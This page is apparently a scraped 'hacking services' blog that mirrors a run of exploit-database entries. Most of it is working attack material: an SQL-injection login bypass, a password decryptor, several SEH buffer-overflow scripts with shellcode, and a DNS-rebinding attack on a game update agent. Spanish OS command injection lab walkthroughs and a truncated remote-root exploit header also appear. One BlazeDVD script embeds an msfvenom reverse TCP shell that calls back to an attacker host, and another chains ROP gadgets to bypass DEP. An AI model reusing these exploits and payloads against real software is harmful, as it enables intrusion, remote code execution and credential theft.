Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863123931

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
All blizzard games are installed alongside a shared tool called "Blizzard Update Agent", investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed.

The agent utility creates an JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance related options. Blizzard use a custom authentication scheme to verify the rpc's are from a legitimate source, it looks like this:

$ curl -si http://localhost:1120/agent
HTTP/1.0 200 OK
Content-Length: 359

{
        "pid" : 3140.000000,
        "user_id" : "S-1-5-21-1613814707-140385463-2225822625-1000",
        "user_name" : "S-1-5-21-1613814707-140385463-2225822625-1000",
        "state" : 1004.000000,
        "version" : "2.13.4.5955",
        "region" : "us",
        "type" : "retail",
        "opt_in_feedback" : true,
        "session" : "15409717072196133548",
        "authorization" : "11A87920224BD1FB22AF5F868CA0E789"
}

This endpoint is permitted without authentication, but all other requests must have a valid "Authorization" header with the token in that response. As with all HTTP RPC schemes like this, a website can send requests to the daemon with XMLHttpRequest(), but I think the theory is they will be ignored because requests must prove they can read and write the authorization property.

I don't think this design will work because of an attack called "dns rebinding". Any website can simply create a dns name that they are authorized to communicate with, and then make it resolve to localhost.

To be clear, this means that *any* website can send privileged commands to the agent.

I have a domain I use for testing called rbndr.us, you can use this page to generate hostnames:

https://lock.cmpxchg8b.com/rebinder.html

Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:

$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 199.241.29.227
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1

Here you can see the resolution alternates between the two addresses I want (note that depending on caching it might take a while to switch, the TTL is set to minimum but some servers round up).

I just wait for the cached response to expire, and then POST commands to the server.

Exploitation would involve using network drives, or setting destination to "Downloads" and making the browser install dlls, datafiles, etc.

I made a very simple demo, I'm sure it's quite brittle, but hopefully you get the idea!

http://lock.cmpxchg8b.com/yah4od7N.html

See screenshot attached of how it's supposed to look.

Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43665.zip
HireHackking 
# Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi
# Date: 13 April 2021
# Exploit Author: sigeri94
# Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/
# Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master
# Version: 1.0

POST /travel/Admin/ HTTP/1.1
Host: 192.168.186.132
Content-Length: 49
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.186.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.186.132/travel/Admin/
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312
Connection: close

username=admin%27+%23&password=admin&Login=Log+in
HireHackking 
// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption
// Date: 2022-08-12
// Exploit Author: p1ckzi
// Vendor Homepage: https://thingm.com/
// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7
// Vulnerable Version: blink1control2 <= 2.2.7
// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.
// CVE: CVE-2022-35513
//
// Description:
// the blink1control2 app (versions <= 2.2.7) utilises an insecure method
// of password storage which can be found by accessing the /blink1/input url
// of the api server.
// password ciphertext for skype logins and email are listed
// and can be decrypted. example usage:
// node blink1-pass-decrypt <ciphertext>
#!/usr/bin/env node
const {ArgumentParser} = require('argparse');
const simpleCrypt = require('simplecrypt');

function exploit() {
  const BANNER = '\033[36m\n\
     _     _ _       _    _\n\
    | |__ | (_)_ __ | | _/ |      _ __   __ _ ___ ___\n\
    | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\
    | |_) | | | | | |   <| |_____| |_) | (_| \\__ \\__ |_____|\n\
    |_.__/|_|_|_| |_|_|\\_|_|     | .__/ \\__,_|___|___/\n\
                                 |_|\n\
         _                            _\n\
      __| | ___  ___ _ __ _   _ _ __ | |_\n\
     / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\
    | (_| |  __| (__| |  | |_| | |_) | |_\n\
     \\__,_|\\___|\\___|_|   \\__, | .__/ \\__|\n\
                          |___/|_|\033[39m';

  const PARSER = new ArgumentParser({
    description: 'decrypts passwords found at the /blink/input url '
    + 'of the blink1control2 api server (version <= 2.2.7 ).'
  });
  PARSER.add_argument('ciphertext', {
    help: 'encrypted password string to use', type: 'str'
  });
  let args = PARSER.parse_args();

  // supplied ciphertext is decrypted with same salt, password, and method
  // used for encryption:
  try {
    let crypt = simpleCrypt({
      salt:     'boopdeeboop',
      password: 'blink1control',
      method:   'aes-192-ecb'
    });
    let ciphertext = args.ciphertext;
    let decrypted = crypt.decrypt(ciphertext);
    console.log(BANNER);
    console.log('\033[32m[+] decrypted password:\033[39m');
    console.log(decrypted);
  }
  catch (TypeError) {
    console.log('\033[33m[!] the submitted hash was invalid.\033[39m');
  }
  finally {
    process.exit(1);
  }
}

exploit()
HireHackking

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Blind OS command injection with time delays”.

image 162

Para resolver el laboratorio, tenemos que ocasionar un delay de tiempo de respuesta en el servidor de 10 segundos. Para ello, haremos uso del OS Command Injection que se encuentra en la función de feedback.

Por lo que nos dirigimos la botón de “Submit feedback”:

image 163
image 164

Como podemos observar, hay unos cuantos campos a rellenar. Por lo que vamos a rellenarlos:

image 165

Ahora, antes de enviar el feedback. Preparamos el burp suite para que reciba las peticiones:

image 166
image 167

Con esto listo, enviamos el feedback para captar la petición:

image 168
image 169

Esta es la petición que se envía al servidor cuando se envía feedback. Para tratar con ella, la enviamos al repeater pulsando Ctrl R:

image 170

Una vez en el repeater, podemos observar como una petición válida simplemente obtiene una respuesta de estado 200 y no mucho más.

Sin embargo, entre todo los parámetros que se están enviando, vamos a intentar ver si podemos ejecutar un comando en alguno de ellos:

image 171

En el campo del mensaje, podemos escapar un comando para que se ejecute y así causemos un delay de respuesta de 10 segundos en el servidor, que era lo que nos pedía el enunciado.

De esta forma, resolvemos el laboratorio:

image 172
HireHackking

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Blind OS command injection with output redirection».

image 173

Para resolver el laboratorio, tenemos que ejecutar el comando whoami en el servidor y leer su salida. Para ello, haremos uso de un Blind OS Command Injection que se encuentra en la función de feedback.

image 174
image 175

Como podemos observar, hay unos cuantos campos a rellenar. Por lo que vamos a rellenarlos:

image 176

Ahora, antes de enviar el feedback. Preparamos el burp suite para que reciba las peticiones:

image 166
image 167

Con esto listo, enviamos el feedback para captar la petición:

image 168
image 177

Esta es la petición que se envía al servidor cuando se envía feedback. Para tratar con ella, la enviamos al repeater pulsando Ctrl R:

image 178

Una vez en el repeater, podemos observar como una petición válida simplemente obtiene una respuesta de estado 200 y no mucho más.

Sin embargo, entre todos los parámetros que se están enviando, vamos a intentar ver si podemos ejecutar un comando en alguno de ellos, y no solo eso, sino redirigir el output a un directorio que podamos acceder. Para de esta forma, poder leer la salida del comando que hemos ejecutado.

Lo primero es determinar a que directorio podemos redirigir la salida de los comandos. Para ello, en este caso, vamos a usar el directorio donde se almacenan las imágenes, que en este caso se nos indica en la descripción del laboratorio:

  • /var/www/images

Sabiendo esto, vamos a intentar realizar un Blind OS Command Injection redirigiendo la salida del comando a un archivo en el directorio de arriba:

image 182

Como se trata de un Blind OS Command Injection, no podemos ver la salida en la respuesta del servidor. Por lo que para confirmar si ha funcionado, tendremos que acceder al archivo al cual hemos redirigido la salida del comando.

Para acceder al archivo en cuestión, como lo hemos puesto en una carpeta llamada «images«. Podemos suponer, que quizás se haya guardado en la misma ruta que por ejemplo las imágenes de las portadas de los productos de la web:

image 179
image 180

Se acceden a las imágenes a través del parámetro filename del archivo image, por lo que vamos a sustituir el valor de este parámetro por el nombre del archivo al que hemos redirigido la salida del comando, en este caso, whoami.txt:

image 183

De esta forma, conseguimos resolver el laboratorio:

image 184

HireHackking

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Blind OS command injection with out-of-band interaction”.

image 185

Para resolver el laboratorio tenemos que ocasionar una búsqueda DNS al servidor público de Burp Suite (burpcollaborator.net). Para ello, haremos uso de un Blind OS Command Injection que se encuentra en la función de feedback.

image 186
image 187

Como podemos observar, hay unos cuantos campos a rellenar. Por lo que vamos a rellenarlos:

image 188

Ahora, antes de enviar el feedback. Preparamos el burp suite para que reciba las peticiones:

image 166
image 167

Con esto listo, enviamos el feedback para captar la petición:

image 168
image 189

Esta es la petición que se envía al servidor cuando se envía feedback. Para tratar con ella, la enviamos al repeater pulsando Ctrl R:

image 190

Una vez en el repeater, podemos observar como una petición válida simplemente obtiene una respuesta de estado 200 y no mucho más.

Sin embargo, entre todos los parámetros que se están enviando, vamos a intentar ver si podemos ejecutar un comando en alguno de ellos, y, con ello, realizar una búsqueda DNS al servidor de burp suite:

image 191

Al realizar esta petición si actualizamos la web, nos daremos cuenta de que hemos resuelto el reto:

image 192

En este caso, sí que es cierto, que lo mejor para realizar los retos estilo «out-of-band» es contar con el Burp Suite PRO para poder hacer uso de la característica de Burp Collaborator client:

image 193

De hecho, el siguiente y último reto de OS Command Injection (al menos a fecha de enero de 2021) no se puede resolver si no es que con Burp Suite PRO 😥.

HireHackking 
source: https://www.securityfocus.com/bid/58624/info

BlazeVideo HDTV Player Standard is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.

BlazeVideo HDTV Player Standard 6.6.0.2 is vulnerable; other versions may also be affected. 

# Exploit Title:BlazeVideo HDTV Player Standard 6.6.0.2 SEH Buffer Overflow
# Date: 19-03-2013
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.blazevideo.com/hdtv-player/
# Download version 6.6.0.2: www.blazevideo.com/download.php?product=blazevideo-hdtv-std
# Version: BlazeVideo HDTV Player Standard 6.6.0.2
# Tested on: Windows 7 German

filename="poc.PLF"



junk = "http://"+ "\x41" * 601 
nseh = "\xEB\x06\x90\x90"
seh  = "\x5F\x17\x60\x61"  #6160175F \EPG.dll
nops = "\x90" * 20
#windows/exec CMD=calc.exe bad \x00\x0a\x1a  
shellcode= ("\xb8\xaf\x8c\x07\x94\xda\xcd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x33\x31\x42\x12\x83\xea\xfc\x03\xed\x82\xe5\x61\x0d\x72\x60"
"\x89\xed\x83\x13\x03\x08\xb2\x01\x77\x59\xe7\x95\xf3\x0f\x04"
"\x5d\x51\xbb\x9f\x13\x7e\xcc\x28\x99\x58\xe3\xa9\x2f\x65\xaf"
"\x6a\x31\x19\xad\xbe\x91\x20\x7e\xb3\xd0\x65\x62\x3c\x80\x3e"
"\xe9\xef\x35\x4a\xaf\x33\x37\x9c\xa4\x0c\x4f\x99\x7a\xf8\xe5"
"\xa0\xaa\x51\x71\xea\x52\xd9\xdd\xcb\x63\x0e\x3e\x37\x2a\x3b"
"\xf5\xc3\xad\xed\xc7\x2c\x9c\xd1\x84\x12\x11\xdc\xd5\x53\x95"
"\x3f\xa0\xaf\xe6\xc2\xb3\x6b\x95\x18\x31\x6e\x3d\xea\xe1\x4a"
"\xbc\x3f\x77\x18\xb2\xf4\xf3\x46\xd6\x0b\xd7\xfc\xe2\x80\xd6"
"\xd2\x63\xd2\xfc\xf6\x28\x80\x9d\xaf\x94\x67\xa1\xb0\x70\xd7"
"\x07\xba\x92\x0c\x31\xe1\xf8\xd3\xb3\x9f\x45\xd3\xcb\x9f\xe5"
"\xbc\xfa\x14\x6a\xba\x02\xff\xcf\x34\x49\xa2\x79\xdd\x14\x36"
"\x38\x80\xa6\xec\x7e\xbd\x24\x05\xfe\x3a\x34\x6c\xfb\x07\xf2"
"\x9c\x71\x17\x97\xa2\x26\x18\xb2\xc0\xa9\x8a\x5e\x29\x4c\x2b"
"\xc4\x35")

f = open(filename,"wb")
f.write(junk+nseh+seh+nops+shellcode)
f.close()
print("Finish")
HireHackking 
# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86

#!/usr/bin/python

file = "exploit.plf"
offset ="A"*(612-4)
nseh = "\xeb\x1e\x90\x90"
seh = "\x34\x31\x02\x64" 
nops = "\x90" * 24

#  msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python  -e x86/alpha_mixed  -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"



buffer = offset + nseh + seh + nops + shellcode

f = open(file,'w')
f.write(buffer)
f.close()
HireHackking 
## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP)
## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
## Version: 7.0.0.0
## Tested on: Windows 7 Home Basic

# Run this file
# bfile.plf will be generated
# In blazeDVD open playlist and select bfile.plf
# a pop up box will appear with text 'emalp'

## Change shellcode according to your needs
## Shellcode max size is aroung 700 bytes.

# bad chars:
# \x00, \x0a, \x0b, \x1a

import struct

bfile = open('bfile.plf','w')

buf = 'A'*84
buf += struct.pack('<L', 0x60325143) # add esp, 0c; ret
buf += 'AAAA' # ret 04 ting from sehandler
buf += 'AAAA'*3 # bypassing 12 bytes i.e 0c
buf += struct.pack('<L', 0x6402091b) # add esp, 200; ret
buf += 'A'*500
buf += 'BBBB' # nseh
buf += struct.pack('<L', 0x640205b1) #sehandler; add esp, 4a0; ret 0x04

#---------------------------------------------------------------------
# this way we have a lot more space for shellcode.
buf += 'AAAA'
# esp lands here.
#setting up the dynamic pointer for virtual protect
buf += struct.pack('<L', 0x61640e32) # pop eax; retn.
buf += struct.pack('<L', 0xffed06a4) # opp of 0012f95c; contains pointer to k32
buf += struct.pack('<L', 0x603267d4) # neg eax, now eax contains 0012f95c
buf += struct.pack('<L', 0x616306ed) # mov eax, dword ptr ds:[eax]
# now eax has the kernel32.dll pointer
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi, ret 04
buf += struct.pack('<L', 0x61640e32) # pop eax ret
buf += 'XXXX' # ret 4 padding
buf += struct.pack('<L', 0xffff675d) #  neg to 98a3
buf += struct.pack('<L', 0x603267d4) # neg eax; ret
# right now eax = 98a3; esi = [0012f95c] = k32.dll val
buf += struct.pack('<L', 0x6033dcc4) # xchg eax,ecx; xor al,60; ret 
buf += struct.pack('<L', 0x61644904) # mov eax,esi; pop esi; ret
buf += 'XXXX' # pop esi padding
buf += struct.pack('<L', 0x641045f4) # sub eax,ecx
# now eax has the pointer to VirtualProtect
#------------------------------------------------------------------------

# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM
# SETTING ESI
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi; ret 4
# SETTING EBP
buf += struct.pack('<L', 0x60327f8f) # pop ebp; ret
buf += 'XXXX' # prev ret 4 padding
buf += struct.pack('<L', 0x60349b63) # jmp esp
# SETTING EBX
buf += struct.pack('<L', 0x61629938) # pop eax; ret
buf += struct.pack('<L', 0xfffffdff) # neg to 0x201
buf += struct.pack('<L', 0x6033b16b) # neg eax; ret
buf += struct.pack('<L', 0x61640124) # xchg eax,ebx
# SETTING EDX
buf += struct.pack('<L', 0x616310e8) # pop eax; ret
buf += struct.pack('<L', 0xffffffc0) # neg of 0x40
buf += struct.pack('<L', 0x6033b16b) # neg eax; retn
buf += struct.pack('<L', 0x61608ba2) # xchg eax,edx
# SETTING ECX
buf += struct.pack('<L', 0x6404fbb9) # pop ecx; ret
buf += struct.pack('<L', 0x1001524e) # writable location
# SETTING EDI
buf += struct.pack('<L', 0x6032b0b8) # pop edi; ret
buf += struct.pack('<L', 0x6162e802) # retn (rop nop)
# SETTING EAX
buf += struct.pack('<L', 0x6162d638) # pop eax; retn
buf += struct.pack('<L', 0x90909090) # nop
# FINALLY PUSHAD
buf += struct.pack('<L', 0x6033cd4a) # push ad

buf += '\x90\x90\x90\x90'*4

# shellcode generated using:
# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp"
#       -b '\x00\x0a\x0b\x1a'
buf += (
"\xbb\x42\xa8\xb5\x43\xda\xc7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x41\x83\xc2\x04\x31\x5a\x0f\x03\x5a\x4d\x4a\x40\x9a\xba\x11"
"\x72\x69\x18\xd2\xb4\x40\xd2\x6d\x86\xad\x76\x19\x99\x1d\xfd"
"\x6b\x56\xd5\x77\x88\xed\xaf\x7f\x3b\x8f\x0f\xf4\x0d\x48\x1f"
"\x12\x07\x5b\xc6\x23\x36\x64\x18\x43\x33\xf7\xff\xa7\xc8\x4d"
"\x3c\x2c\x9a\x65\x44\x33\xc9\xfd\xfe\x2b\x86\x58\xdf\x4a\x73"
"\xbf\x2b\x05\x08\x74\xdf\x94\xe0\x44\x20\xa7\x3c\x5a\x72\x43"
"\x7c\xd7\x8c\x8a\xb2\x15\x92\xcb\xa6\xd2\xaf\xaf\x1c\x33\xa5"
"\xae\xd6\x19\x61\x31\x02\xfb\xe2\x3d\x9f\x8f\xaf\x21\x1e\x7b"
"\xc4\x5d\xab\x7a\x33\xd4\xef\x58\xdf\x87\x2c\x12\xd7\x6e\x67"
"\xda\x0d\xf9\x45\xb5\x43\xb7\x47\xaa\x0e\xaf\xc7\xcd\x50\xd0"
"\x71\x74\xab\x95\xfc\xaf\x51\x9a\x87\x4c\xb2\x0e\x60\xe2\x45"
"\x51\x8f\x72\xfc\xa5\x18\xe9\x93\x95\x99\x99\x58\xe7\x37\x3e"
"\xf7\x72\x3b\xdb\x75\x4c\x60\xab\x26\x88\x9c\x25\x30\x86\x5f"
"\x60\xb9\xaf\x62\xdb\x7a\x07\xc0\x91\xc0\xd0\x19\x0e\x6b\x36"
"\x7e\xb1\x74\x39\xe9\x22\xf3\x9d\xca\xd4\x62\x7a\x6e\x67\x0d"
"\xc9\x15\x14\xbe\xe0\x0e\x52\x1c\x26\xbb\xea\x7e\x4e\xcb\xb4"
"\xa0\xae\x43\x20\xcc\xcf\xff\x9b\xc7\x87\x4c\xf8\xd2\x1e\xad"
"\x31\x0f\x72\x7d\x63\xfd\x8d\x51\xb2\xc1\x21\xad\xe0\xc9"
    )
buf += '\x90\x90\x90\x90'*5

buf += 'E'*200

bfile.write(buf)
bfile.close()
HireHackking

Blat 3.2.14 - Stack Overflow 

1.       Vulnerable Product Version:

*Blat v3.2.14*
Link: blat.net


2.       Vulnerability Information

Impact: Attacker may gain administrative access / can perform a DOS

Remotely Exploitable: No

Locally Exploitable: May be possible


3.       Product Details

An open source Windows (32 & 64 bit) command line SMTP mailer. We can use
it to automatically email logs, the contents of a html FORM, or whatever
else you need to send.

Since blat is lightweight, user friendly and simple (but awesome) many
vendors incorporates it with their Softwares. I have seen blat in many
commercial Softwares which use it for sending mails to its customers. And
Blat is awesome.


4.       Vulnerability Description

The Overflow vulnerability lies in the profile option parameter “–p”. When
a string of 236 bytes is send to blat, the EBP and EIP register gets
overwritten by the user input.

Reproduction:

*                blat.exe crashes with this command blat.exe –install
smtp.my.tld 127.0.0.1 –p <”A”*234+”B”*2>*


Feeding this command overwrites EBP with 0x00410041 and EIP with 0x00420042
(Please refer to the attached screen shot)


5.       Links

https://sourceforge.net/projects/blat/

https://groups.yahoo.com/neo/groups/blat/conversations/messages/13759
HireHackking 
'''
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt


Vendor:
================================
www.blat.net
http://sourceforge.net/projects/blat/


Product:
================================
Blat v2.7.6

blat.exe is a Win32 command line eMail tool
that sends eMail using SMTP or post to usenet using NNTP.


Vulnerability Type:
=====================
Stack Buffer Overflow


CVE Reference:
==============
N/A


Vulnerability Details:
=====================
An older release of blat.exe v2.7.6 is prone to a stack based buffer
overflow when sending
malicious command line arguments, we need to send two arguments first
can be whatever e.g. "AAAA"
then second argument to trigger the buffer overflow and execute
arbitrary code on the victims OS.


Stack dump...


EAX 00000826
ECX 0018E828 ASCII "Blat saw and processed these options, and was
confused by the last one...
 AAAAAAA...
EDX 0008E3C8
EBX 000000E1
ESP 0018F05C ASCII "AAAAA...
EBP 41414141
ESI 00426E88 blat.00426E88
EDI 00272FD8
EIP 41414141   <-------------- BOOM!

C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 1  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)


Exploit code(s):
===============

Python script to exploit...
'''

import struct,os,subprocess


#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\blat276\\full\\blat.exe "
eip=struct.pack('<L', 0x776D0115)      #<--- JMP ESP kernel32.dll

payload="A"*2018+eip+"\x90"*20+sc
subprocess.Popen([vulnpgm, "A"*4, payload], shell=False)


'''
Disclosure Timeline:
=========================================================
Oct 14, 2015  : Public Disclosure


Severity Level:
=========================================================
Med


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that
due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security
related information or exploits by the author or elsewhere.

by hyp3rlinx
'''
HireHackking 
#!/usr/bin/python
# logstorm-root.py
#
# BlackStratus LOGStorm Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2016
#
# -Synopsis-
#
# "Better Security and Compliance for Any Size Business"
#
# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among
# other things, to assume complete control over the virtual appliance with root privileges. This is
# possible due to multiple network servers listening for network connections by default, allowing
# authorization with undocumented credentials supported by appliance's OS, web interface and sql server.
#
# -Tested-
#
# v4.5.1.35
# v4.5.1.96
#
# -Usage-
#
# Dependencies: pip install paramiko MySQL-python
#
# There are (5) actions provided in this script: root, reset, sql, web and scan.
#
# [root]  utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command
# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password
